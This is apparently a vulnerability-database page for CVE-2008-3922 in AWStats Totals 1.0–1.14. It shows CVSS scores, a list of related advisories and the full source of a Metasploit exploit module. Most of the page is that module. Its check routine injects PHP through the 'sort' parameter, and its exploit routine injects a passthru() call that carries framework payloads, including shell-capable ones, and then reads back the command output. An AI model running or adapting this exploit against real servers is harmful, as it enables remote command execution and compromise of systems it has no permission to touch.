Lucene search
HistoryMay 25, 2011 - 10:42 a.m.
AWStats Totals multisort Remote Command Execution
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
This module exploits an arbitrary command execution vulnerability in the AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'AWStats Totals multisort Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in the
AWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.
},
'Author' => [ 'aushack' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2008-3922'],
['OSVDB', '47807'],
['BID', '30856']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => '2008-08-26',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The full URI path to awstatstotals.php", "/awstatstotals/awstatstotals.php"]),
])
end
def check
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']),
'vars_get' =>
{
'sort' => '"].phpinfo().exit().$a["'
}
}, 25)
if (res and res.body.match(/localhost/))
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
command = Rex::Text.uri_encode(payload.encoded)
sploit = normalize_uri(datastore['URI']) + '?sort="].passthru(\'echo%20YYY;' + command + ';echo%20YYY;\').exit().%24a["'
res = send_request_raw({
'uri' => sploit,
'method' => 'GET',
'headers' =>
{
'Connection' => 'Close',
}
}, 25)
if (res)
print_status("The server returned: #{res.code} #{res.message}")
m = res.body.match(/YYY\n(.*)\nYYY/m)
if (m)
print_status("Command output from the server:")
print("\n" + m[1] + "\n\n")
else
print_status("This server may not be vulnerable")
end
else
print_status("No response from the server")
end
end
end
Related
packetstorm
packetstorm
AWStats Totals 1.14 Remote Command Execution
2011-05-26 00:00:00
cve
cve
CVE-2008-3922
2008-09-04 18:41:00
dsquare
dsquare
Awstats Totals <= 1.14 RCE
2012-01-26 00:00:00
checkpoint_advisories
checkpoint_advisories
prion
prion
Code injection
2008-09-04 18:41:00
exploitdb
exploitdb
AWStats Totals 1.14 - 'AWStatstotals.php' Remote Code Execution
2008-09-05 00:00:00
AWStats Totals 1.14 multisort - Remote Command Execution (Metasploit)
2011-05-25 00:00:00
openvas
openvas
AWStats Totals 'sort' Parameter RCE Vulnerabilities
2011-06-07 00:00:00
zdt
zdt
AWStats Totals =< v1.14 multisort Remote Command Execution
2011-05-25 00:00:00
cvelist
cvelist
CVE-2008-3922
2008-09-04 18:00:00
nvd
nvd
CVE-2008-3922
2008-09-04 18:41:00
nessus
nessus
nmap
nmap
http-awstatstotals-exec NSE Script
2011-08-23 06:29:12
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
Related for MSF:EXPLOIT-UNIX-WEBAPP-AWSTATSTOTALS_MULTISORT-